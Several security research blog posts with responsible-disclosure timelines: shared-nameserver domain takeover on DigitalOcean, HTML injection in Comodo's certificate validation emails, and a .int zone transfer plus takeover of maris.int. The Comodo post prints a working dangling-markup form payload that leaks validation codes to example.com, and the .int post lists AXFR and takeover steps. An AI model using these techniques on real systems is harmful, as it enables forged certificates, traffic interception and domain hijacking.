While I expected that most of the domains were purely spam/junk domains that had not yet been configured (perhaps all belonging to a single domain reseller for example) – this was not the case. The sinkhole server was just a standard nginx web server returning a blank webpage and logging web requests. After having the server up for just a few days the access logs have grown to 1.8GB in size with a constant stream of requests pouring in. Most of these are unsurprisingly from search engines eager to crawl the web as quickly as possible (~80% of the traffic was from spiders) however the rest are legitimate users navigating to the now redirected websites.

DigitalOcean’s Response

After sinkholing the domains and proving that the theory was in fact true, I reached out to DigitalOcean’s security team describing the issue (using PGP as specified by their security page). Their response was the following:

Matthew,

Thank you for sending this in. This is a known workflow within our platform. We are committed to always improving our customer’s experience and have been examining ways of minimizing the type of behavior you are describing.

Regards,

Nick

Nicolas [REDACTED] [email protected]

So essentially they’re aware and may be looking for ways to mitigate this behaviour in the future but they don’t appear to be making any immediate plans.

Additionally my DigitalOcean account had been locked. This prevented me from the next logical step: changing all the DNS to point to 127.0.0.1 – effectively neutering the traffic. When asking support why my account had been locked (though I had some idea) I received the following response:

There has been a response to your ticket:

Hi there,

We have reviewed your account, and we are not able to provide further service.

I understand this may be inconveniencing, but we are not going to be able to provide you hosting services.

This is a final decision and is not subject to change.

Regards,

Cash [REDACTED] Trust & Safety Specialist

Digital Ocean Support

So no reasoning for the ban and there would be no further support. This leaves me in the uncomfortable position of being stuck with all the traffic I’ve been sinkholing. Since I can’t access my account to change the domain’s DNS, I’m stuck receiving thousands of requests a minute from various sites. I can’t tear down the EC2 sinkhole server because the Elastic IP may be re-allocated to someone more malicious so I have to pay to keep it up (for how long I’m not sure). While I’ve stopped all services on the server to protect the privacy of the users accidentally hitting these sites, and have srm-ed the access logs, I am unable to stop the flood of traffic going forward. Being in this awkward position, I reached out to DigitalOcean’s team to see if they can assist in deleting the domains from my account (sadly leaving them vulnerable again) or sinkholing the DNS to 127.0.0.1. I received a very helpful response from someone on the security team and it appears they will look into it.

In Review

This provides some interesting insight as to why the pattern of using unique nameservers for importing domain names is so common (to prevent exactly this issue). It’s worthy to note that any system which uses non-unique nameservers for domain name importing is likely vulnerable to this exact same type of attack pattern (what about registrars? domain parking services?). Further research into this area is likely to yield similar results.

Until next time,

-mandatory

Proofread by udanquu

I recently decided to investigate the security of various certificate authority’s online certificate issuing systems. These online issuers allow certificate authorities to verify that someone owns a specific domain, such as thehackerblog.com and get a signed certificate so they can enable SSL/TLS on their domain. Each online certificate issuing system has their own process for validation of domains and issuing certificates which leaves a lot of attack surface for malicious entities.

A Summary On Certificate Authorities & SSL/TLS

For those unfamiliar with the current certificate authority (CA) system used on the web, I’d recommend watching Moxie Marlinspike’s talk on SSL and the Future of Authenticity for an in-depth look. This is also happens to be one of my favorite talks and Moxie is a great speaker, so I highly recommend it (bonus points, he also talks about Comodo specifically). For those who don’t want to watch the talk, I’ll write a short summary here.

The SSL/TLS system, which encrypts communications in modern web browsers, works by your browser trusting a list of built-in certificate authorities. Whenever your browser attempts to connect to a site over SSL/TLS it will retrieve the site’s certificate and check to see if it is trusted by one of these built-in authorities. These authorities are allowed to mint intermediate certificate authorities which can mint SSL/TLS certificates for arbitrary websites. This creates tall trees of trusts where one certificate mints another certificate, which finally mints a certificate for an website like example.com. For a good visual of the certificate authority trees of trust, click here.

This entire system was designed to prevent man in the middle attacks which attempt to snoop on a victim’s traffic. When SSL/TLS is implemented properly, an attacker would have to present a valid certificate which has been signed by one of the trusted intermediate certificate authorities. If an attacker did have access to a valid signed certificate for a site, it would allow him or her to intercept all traffic to that site and the browser would still show the “secure lock” in the URL bar saying everything is fine. Suffice to say, ensuring the online systems which allow people to obtain signed certificates are secure is very important. If ANY of the existing online certificate issuing systems were compromised then the entire system is essentially bypassed.

Hunting for Vulnerable Issuers

When I started out hunting for possible vulnerabilities, my initial strategy was to look for the cheapest, most 90’s-looking, poorly designed certificate authority websites. Since the compromise of any certificate authority allows an attacker to bypass all the protections of SSL/TLS it doesn’t even have to be a popular provider because they all have the same power. After doing a bit of searching I realized it would be advantageous to do testing against authorities that had free SSL certificates, since doing tests against these wouldn’t cost me any money. I passed on Let’s Encrypt because I figured it had already been thoroughly audited, the second site I saw was a 30 day free trial from Positive SSL (a company owned by Comodo). This seemed like as good a target as any, so I went through their online process for issuing a free 30-day trial certificate for my website thehackerblog.com.

Comodo’s 30-Day PositiveSSL Certificate Online Issuer

The following is a screenshot of the PositiveSSL website, advertising the free 30 day trial:

1-free-ssl-pageThe process starts by requesting a certificate signing request (CSR) from the interested user. This can easily be done by using OpenSSL via the command line:

openssl req -new -newkey rsa:2048 -nodes -keyout yourdomain.com.key -out yourdomain.com.csr

Once you have your CSR, you then have to paste it into the web application:

2-csr-request

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Upon entering your CSR and selecting the software you used to generate it, you then select the email address for domain validation (from the website’s WHOIS) and arrive on a “Corporate Details” page. This is the vulnerable portion of the application, where you fill out your company/personal information getting to the email validation portion:

4-corporate-details

When I first went through this process I mindlessly filled out junk HTML for all of these fields. The service then sent a verification email to the email address on the website’s WHOIS info. Once I received the email, I noticed the HTML was not being properly escaped and the markup I had entered before was being evaluated. This is really bad because the email also contained a verification code which could be used to obtain an SSL/TLS certificate for my website. This means if I had a way to leak a victim’s token, I could obtain a valid certificate for their site, so that I could intercept traffic to that site seamlessly without users knowing I was doing so.

Dangling Markup Injection in Confirmation Emails

Since almost no email clients support _

Delivered-To: mandatory@[REDACTED]
...trimmed for brevity...
From: "Comodo Security Services" <noreply_support@comodo.com>
To: "mandatory@[REDACTED]" <mandatory@[REDACTED]>
Date: Sun, 05 Jun 2016 00:21:23 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="(AlternativeBoundary)"
Message-ID: <douEzQt+Ql/CywdHoZA/kg@mcmail1.mcr.colo.comodo.net>
...trimmed for brevity...
--(AlternativeBoundary)
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 8bit

<html>
<head>
  <style type=text/css>
  <!--
    body { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    p { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    pre { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    pre.validate { font-family: Arial, Helvetica, sans-serif; font-size:11pt; color:#007A00; font-weight: bold;}
    pre.reject { font-family: Arial, Helvetica, sans-serif; font-size:7pt; color:#FF0000; font-weight: bold;}
    td { font-family: Arial, Helvetica, sans-serif; font-size: 10pt }
    .p8 { font-family: Arial, Helvetica, sans-serif; font-size: 8pt; font-weight: normal }
    .p4 { font-family: Arial, Helvetica, sans-serif; font-size: 10pt; color: #006699; font-weight: bold }
    A:link    { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:visited { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:active  { font-family: Arial; color: #000066; font-weight: bold; text-decoration: underline }
    A:hover   { font-family: Arial; color: #003399; font-weight: bold; text-decoration: underline }
    .title { font-family: Arial, Helvetica, sans-serif; font-size: 11pt; font-weight: bold; color: #003399 }
    -->
  </style>
</head>
<body bgcolor=#CCCCCC text=#000000 leftmargin=4 topmargin=5>
<table width=780 border=0 cellspacing=0 cellpadding=1 align=left>
  <tr><td align=left><img border="0" src="http://secure.comodo.net/images/banners/logo_comodo.png"></td></tr>
  <tr>
    <td bgcolor=#000000>
      <table width=780 border=0 cellspacing=0 cellpadding=3 align=left>
        <tr>
          <td bgcolor=#FFFFFF>
            <br><font size=2 class=title>Domain Control Validation for:[REDACTED]</font>
          </td>
        </tr>
        <tr>
          <td bgcolor=#FFFFFF colspan=2>
            <p><br>Dear mandatory@[REDACTED],</p>
            <pre>
We have received a request to issue an SSL certificate for:
Domain: [REDACTED]
Subject: 
             <h1>Injection Test</h1>
<br>This order was placed by <h1>Injection Test</h1><h1>Injection Test</h1> whose phone number is 1231231234 and whose email address is mandatory@[REDACTED]</pre>
            <pre class="validate">
<b>To permit the issuance of the certificate please browse <a href="https://secure.comodo.net/products/EnterDCVCode?orderNumber=21757254"><font color=#007A00>here</font></a>
and enter the following "validation code":</b></pre>
            <pre class="validate" style="text-align:center;"><b>Z7R58i[REDACTED]</b></pre>
            <pre class="reject"><br><br><br><br>
**************PLEASE NOTE CHOOSING THE OPTION BELOW WILL REJECT THE CERTIFICATE**************
...trimmed for brevity...

Peeking at the above raw email we notice that the HTML is not properly being escaped. Additionally, Comodo makes use of a static email boundary of (AlternativeBoundary) which is dangerous because it allows us to inject arbitrary email sections into the email that Comodo sends for domain validation. We’ll ignore the email boundary issue and focus on the HTML injection issue. As it turns out, the Company Name field we saw previously is not length-limited which allows us to inject arbitrary HTML into the end email. We will take advantage of this by setting our Company Name to the following:

<b><u>You have 24 hours to reject this request.</u></b></pre>
<form action="http://example.com/"><button type="submit">Click here to reject this request.</button><textarea style="width: 0px; max-height: 0px;" name="l">

The above HTML will redress the email and start an unclosed <textarea> block which will “swallow” the rest of the email’s HTML with a submit button and form pointing to my website. The following is a screenshot of the email sent to me from Comodo:

7-comodo_email_ssl

As can be seen in the above screenshot the final email has been redressed to state that the user has 24 hours to reject a pending SSL/TLS certificate request. Unknown to the victim however, clicking the button will actually leak the verification code to my own site via <form> submit. Basically, any site owner that receives this email is one click away from allowing an attacker to issue a certificate for their site. This is a basic redress example, since you have arbitrary HTML you could make the entire thing much more convincing. Form submissions are a great way to leak secrets like this because they work in many different mail clients. Even the iPhone’s Mail app supports this functionality:

redacted_iphone_email

Once I’ve leaked the code from the victim in this way, I can then log into the account I created during the certificate request process and download the SSL/TLS certificate. The following is a screenshot of what this looks like:

10-download-certificate

In a real world attack scenario, a malicious actor would forge these emails out to popular websites such as Facebook.com, Google.com, etc in order to snoop on the traffic of their victims. Since the email passes SPF checks and is legitimately from Comodo, a system administrator would have no reason to believe this email is not completely authentic.

Comodo Resellers

One other important thing to note is that resellers of Comodo’s certificates were also affected as well. This risk is amplified because resellers can have a customized HTML header and footer for the verification emails that get sent out. This means that it would be possible for a third party vendor to have a dangling <img> tag in the header combined with a single quote in the footer which would side-channel leak the verification code in the email body (similar to the attack above, but automatic with no user interaction). This style of dangling mark-up injection wasn’t possible in the previously proof-of-concept but is possible for resellers. I was not able to build a proof-of-concept for this however, because I didn’t want to probe further into their reseller system after reporting the initial vulnerability.

Disclosure Timeline

  • June 4th, 2016 – Emailed [email protected] and reached out on Twitter to @Comodo_SSL.
  • June 6th, 2016 – Robin from Comodo confirms this is the correct contact to report security issues, provides PGP key.
  • June 6th, 2016 – Emailed Comodo the vulnerability PGP-encrypted and sent my PGP public key.
  • June 7th, 2016 – Robin from Comodo confirms they understand the bug and state they will work on a fix as soon as possible.
  • June 20th, 2016 – Emailed Comodo for status update.
  • July 1st, 2016 – Outline timeline for responsible disclosure date (90 days from report date per industry standards).
  • July 25th, 2016 – Robin from Comodo confirms a fix has be put in place.

Final Thoughts

Normally, the name of the game when it comes to finding a way to mint arbitrary SSL/TLS certificates is to find the smallest, cheapest, and oldest certificate provider you can. Comodo is the exact opposite of this, they have a 40.6% marketshare and are the largest minter of certificates on the internet. Basically, they are the largest provider of SSL/TLS certificates and yet they still suffer from security issues which would be (hopefully) caught on a regular penetration testing engagement. This paints a grim picture for the certificate authority system. If the top providers can’t secure their systems, how could the smaller providers possibly be expected to do so? It’s a hard game to play since the odds are heavily stacked in the attacker’s favor with tons of certificate authorities all with the power to mint arbitrary certificates. A single CA compromise and the entire system falls apart.

Luckily, we have some defences against this with newer web technologies such as Public Key Pinning which offers protection against attackers using forged certificates. The following is a quote from MSDN about the functionality:

“To ensure the authenticity of a server’s public key used in TLS sessions, this public key is wrapped into a X.509 certificate which is usually signed by a certificate authority (CA). Web clients such as browsers trust a lot of these CAs, which can all create certificates for arbitrary domain names. If an attacker is able to compromise a single CA, they can perform MITM attacks on various TLS connections. HPKP can circumvent this threat for the HTTPS protocol by telling the client which public key belongs to a certain web server.”

https://developer.mozilla.org/en-US/docs/Web/Security/Public_Key_Pinning

This is a fairly powerful mitigation against an attacker with a forged certificate. However, the support is iffy with a lack of support in Internet Explorer, Edge, Safari, and Safari on iOS.

For an alternative system to CA’s, a few ideas have been presented but none have widespread support. One example being Convergence which was presented by Moxie in the talk previously mentioned in this post. However this is only supported by Firefox and I’ve personally never heard of people using it.

Many people like to speak of a certificate authority hack as if it was something only a nation state could accomplish, but just a day’s worth of searching led me to this issue and I don’t doubt that many providers suffer from much more severe vulnerabilities. What happens when your attacker doesn’t care about ethical boundaries and is willing to do much more in-depth testing? After all, this is Comodo, the largest provider. What about the smaller certificate providers? Do they really stand a chance?

Until next time,

-mandatory

The .int or international TLD is perhaps one of the most exclusive extensions available on the Internet. The number of domains on the extension is so small it has it’s own Wikipedia page.

Introduced around 27 years ago its primary purpose has been for international treaty organizations. The requirements for a .int domain are listed on the Internet for Assigned Numbers Authority (IANA) website and are the following:

An international treaty between or among national governments must be provided. We should be able to look up the international treaty in the UN online database of treaties, or you should provide us a true certified copy of the treaty. Please be sure what you provide is a treaty, not the constitution or bylaws of the organization. We recognize as organizations qualified for domain names under the .int top-level domain the specialized agencies of the UN, and the organizations having observer status at the UN General Assembly.

The treaty submitted must establish the organization applying for the .int domain name. The organization must be established by the treaty itself, not by a council decision or similar.

The organization that is established must be widely considered to have independent international legal personality and must be the subject of and governed by international law. The declaration or the treaty must have created the organization. If the organization created is a secretariat, it must have a legal personality. For example, it must be able to enter into contracts and be party to legal proceedings.

These are no small requirements, no singular nation could register for a .int domain even if they wished to. That being said, there are some exceptions to the above rules, such as the YMCA which has a .int domain name due to it being grandfathered over when these restrictions were put into place. However, future organizations who wish to have a .int domain name must follow the restrictions outlined by IANA above.

Digging Into .int DNS

Let’s take a look into the DNS structure of the .int TLD. The first thing to look into is getting a copy of the .int zone file which would have a list of all existing .int domains and their authoritative nameservers. Strangely, the list of .int domains on Wikipedia has only one article source, and that was the following URI: http://www.statdns.com/files/zone.int. This zone file appeared to be accurate, but why was it hosted on a random domain like statdns.com? How did they get it? To find the answer we’ll have to investigate the .int nameservers.

So, let’s take a look at the .int nameservers. To start, what are they?

[email protected] ~/Desktop> dig NS int.

; <<>> DiG 9.8.3-P1 <<>> NS int.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48321
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;int.                IN    NS

;; ANSWER SECTION:
int.            16208    IN    NS    ns.icann.org.
int.            16208    IN    NS    sec2.authdns.ripe.net.
int.            16208    IN    NS    ns.uu.net.
int.            16208    IN    NS    ns0.ja.net.
int.            16208    IN    NS    ns1.cs.ucl.ac.uk.

;; Query time: 25 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Jun 11 16:43:46 2016
;; MSG SIZE  rcvd: 153

It appears that there are five .int nameservers. These servers know about the existence of every single .int domain name. So why don’t we ask them for a copy? This is possible with the DNS query AXFR which is used for DNS zone transfers. Normally, AXFR queries are only allowed from trusted slave DNS servers who need to replicate the DNS information held by the master. However, occasionally you will get lucky and a server will be configured to allow anyone to perform a zone transfer (AXFR) request. With the following commands we can ask each zone server for its copy of the zone file for the .int TLD:

dig @ns.icann.org. AXFR int.
dig @sec2.authdns.ripe.net. AXFR int.
dig @ns.uu.net. AXFR int.
dig @ns0.ja.net. AXFR int.
dig @ns1.cs.ucl.ac.uk. AXFR int.

After asking all of them, it turns out that only ns1.cs.ucl.ac.uk is happy to provide us with that information:

[email protected] ~/Desktop> dig @ns1.cs.ucl.ac.uk. AXFR int.

; <<>> DiG 9.8.3-P1 <<>> @ns1.cs.ucl.ac.uk. AXFR int.
; (1 server found)
;; global options: +cmd
int.            86400    IN    SOA    sns.dns.icann.org. noc.dns.icann.org. 2016061000 3600 1800 604800 86400
int.            86400    IN    NS    ns.uu.net.
int.            86400    IN    NS    ns.icann.org.
int.            86400    IN    NS    ns0.ja.net.
int.            86400    IN    NS    ns1.cs.ucl.ac.uk.
int.            86400    IN    NS    sec2.authdns.ripe.net.
int.            60    IN    TXT    "$Id: int 5232 2016-06-10 23:02:24Z cjackson $"
ippc.int.        86400    IN    NS    dnsext01.fao.org.
ippc.int.        86400    IN    NS    dnsext02.fao.org.
ices.int.        86400    IN    NS    ns1.hosting2.dk.
ices.int.        86400    IN    NS    ns2.hosting2.dk.
ices.int.        86400    IN    NS    ns3.hosting2.dk.
eumetsat.int.        86400    IN    NS    ns1.p21.dynect.net.
...trimmed for brevity...

Ah! So that’s how they got the list, one of the TLD’s nameservers allows global DNS zone transfers. This nameserver has just given us a full copy of .int’s zone.

So now we have a list of all .int domains. We’ll parse out the domains into a text file and then run an NS query against all of them to check which nameservers they have:

dig NS -f int_domains.txt

This is interesting because while the .int domains can only be created by IANA, the nameservers can be set to arbitrary domains. After analysing the results from the above query, the domain maris.int returned SERVFAIL as a status code when requesting its nameservers. This is a pretty vague error in DNS usually meaning that something has gone wrong with the authoritative nameservers for the domain. That’s odd, what are those nameservers? We’ll do a dig query asking a .int nameserver to find out:

[email protected] ~/Desktop> dig @ns.icann.org. NS maris.int

; <<>> DiG 9.8.3-P1 <<>> @ns.icann.org. NS maris.int
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 16832
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 2, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;maris.int.            IN    NS

;; AUTHORITY SECTION:
maris.int.        86400    IN    NS    www.ispo.cec.be.
maris.int.        86400    IN    NS    cobalt.aliis.be.

;; Query time: 30 msec
;; SERVER: 199.4.138.53#53(199.4.138.53)
;; WHEN: Sat Jun 11 18:02:19 2016
;; MSG SIZE  rcvd: 83

So, the maris.int domain has two nameservers, www.ispo.cec.be and cobalt.aliis.be. Let’s check the first nameserver to see if we can find the problem. We’ll do a quick A record query with dig to accomplish this:

[email protected] ~/Desktop> dig A www.ispo.cec.be

; <<>> DiG 9.8.3-P1 <<>> A www.ispo.cec.be
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 32301
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;www.ispo.cec.be.        IN    A

;; AUTHORITY SECTION:
cec.be.            1799    IN    SOA    tclux1.cec.lu. di-cox.cec.eu.int. 2013062501 3600 600 604800 3600

;; Query time: 443 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Jun 11 18:05:36 2016
;; MSG SIZE  rcvd: 99

As can be seen in the above output we received an NXDOMAIN error. This means the record does not exist. We’ll run another NS query to see if the base domain exists or if it’s just this subdomain:

[email protected] ~/Desktop> dig ns cec.be

; <<>> DiG 9.8.3-P1 <<>> ns cec.be
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35109
;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;cec.be.                IN    NS

;; ANSWER SECTION:
cec.be.            3599    IN    NS    ns1bru.europa.eu.
cec.be.            3599    IN    NS    tclux17.cec.eu.int.
cec.be.            3599    IN    NS    tcbru22.cec.eu.int.
cec.be.            3599    IN    NS    ns1lux.europa.eu.
cec.be.            3599    IN    NS    auth00.ns.be.uu.net.
cec.be.            3599    IN    NS    tclux1.cec.eu.int.
cec.be.            3599    IN    NS    ns2bru.europa.eu.
cec.be.            3599    IN    NS    ns2lux.europa.eu.
cec.be.            3599    IN    NS    auth50.ns.be.uu.net.
cec.be.            3599    IN    NS    tcbru25.cec.eu.int.

;; Query time: 550 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Jun 11 18:09:28 2016
;; MSG SIZE  rcvd: 268

So the base domain clearly exists but the subdomain record does not. This nameserver is clearly busted so all DNS queries should fail over to the secondary cobalt.aliis.be server. Let’s take a look at that one next. We’ll start with an A query:

; <<>> DiG 9.8.3-P1 <<>> A cobalt.aliis.be
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 51336
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;cobalt.aliis.be. IN    A

;; AUTHORITY SECTION:
be.            599    IN    SOA    a.ns.dns.be. tech.dns.be. 1015004648 3600 1800 2419200 600

;; Query time: 176 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Jun 11 18:16:10 2016
;; MSG SIZE  rcvd: 101

Interesting, this query returned an NXDOMAIN too. What about the base domain then?

; <<>> DiG 9.8.3-P1 <<>> A aliis.be
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 52102
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;aliis.be. IN    A

;; AUTHORITY SECTION:
be.            565    IN    SOA    a.ns.dns.be. tech.dns.be. 1015004648 3600 1800 2419200 600

;; Query time: 21 msec
;; SERVER: 172.16.0.1#53(172.16.0.1)
;; WHEN: Sat Jun 11 18:16:43 2016
;; MSG SIZE  rcvd: 101

Wow, the base domain doesn’t exist as well! But wait, this is actually a bad deal because anyone can register a .be domain name. This means that anyone can register aliis.be and take over maris.int since aliis.be is authoritative for that domain. So, with this information, we will purchase aliis.be for around 13$. We now have full control of maris.int, but more importantly, we’ve prevented anyone else with more malicious intent from taking it over. What to do now?

Restoring maris.int To Its Original Glory

So what did maris.int look like before their nameservers expired? To find out we can check out Archive.org:

https://web.archive.org/web/20020126032540/http://www.maris.int/

The website definitely has a retro feel to it, especially because it has a “best view when using Netscape” image at the bottom of some of its pages:

netscape

 

 

We can now use an archive.org downloader to get a copy of all of the website’s pages locally. We now have everything we need to restore this website!

The first thing we need to do is set up the DNS for aliis.be. We’ll add an A record for the root domain which points to an Amazon instance we’ve spun up. We’ll also add a wildcard subdomain record which will redirect all sub-domain CNAME queries to just resolve to the IP defined in the root A record. Now the authoritative nameserver has been set up as the AWS instance we’ve spun up. Next we will install the BIND DNS server and configure it as an authoritative host for the maris.int zone. Then we can set up all requests for any subdomains of maris.int to point to the AWS server as well. So now any requests for maris.int or its subdomains will all be pointed to our server.

With all of this setup, we can now use Python to rehost the original website (based off of the snapshot provided by Archive.org):

maris_rehosted

Finally, because I think that some people may question that this ever happened, here is an Archive.org link snapshot of this website (with the text I added): https://web.archive.org/web/20160620005141/http://www.maris.int

Disclosure Timeline

  • June 10, 2016: Initial email is sent to [email protected] communicating that their is an issue that allows complete takeover of a .int domain name. A link for information about responsible disclosure and a link to my PGP is provided.
  • June 13, 2016: IANA confirms that this is the correct location for reporting the issue.
  • June 13, 2016: The issue is communicated in full to IANA.
  • June 15, 2016: A follow up email is sent to IANA asking if everything was communicated properly and offering further information if the original report is unclear.
  • June 21, 2016: IANA confirms the issue and states that they will get in contact with the folks at MARIS. The nameservers however remain unchanged.
  • July 9, 2016: Issue is publicly disclosed due to there being no possibility of further exploitation (since the domain has been purchased by me). I will continue to renew the domain until this vulnerability has been fixed by the folks at MARIS/IANA (and will continue to host their original site unless they prefer otherwise) to prevent others from performing malicious actions with it.

Pondering Issues With Restricted TLDs

The idea of having a restricted TLD is an interesting one. The .int TLD is only one of the many restricted TLDs out there. Many other TLDs are restricted such as .gov, .edu, and .mil. The problem with attempting to restrict who can access a specific TLD is that much of DNS and the web is built upon the idea of pointing to third parties. For example, the DNS record type of CNAME can be used to point a subdomain to another fully qualified domain name (FQDN). Another obvious example is the DNS record type of NS which can be pointed to a FQDN. This is what we exploited to take over maris.int. Any DNS record which points to a domain name outside of our restricted TLD space can expire and then be registered by a third party. This goes for IP addresses as well, what if you use an A record to point to some third party web host? Suddenly if the hosting provided goes out of business and someone else gets control over the IP they have a subdomain or domain in your restricted TLD.

Even worse, imagine you still wanted to restrict your TLD space. You decided that all DNS must point to IP addresses and domains owned by you. So you have to host the DNS and servers for every domain name under your TLD. You’ve finally prevented anyone from getting into your TLD space right? Well, not quite._

_

Once we move up the protocol chain a bit we venture into the web. At this protocol level you’re serving up webpages to your visitors on example.restrictedtld and the servers are under your control as well as the DNS. However, now you’ve run into an interesting problem. The nature of the web is tangled as well. What if you want to pull in JavaScript from a CDN? What about CSS or JavaScript? All of this content must also be hosted by you and you alone, otherwise it’s possible that the domains which host this content could expire as well, leaving you in the same position as you were before.

To summarize, it’s a fairly hard problem which runs against the grain the Internet’s inter-connective design. It would not be hard for an attacker to acquire a subdomain or domain on your restricted TLD given a bit of research and scanning.

Until next time,

-mandatory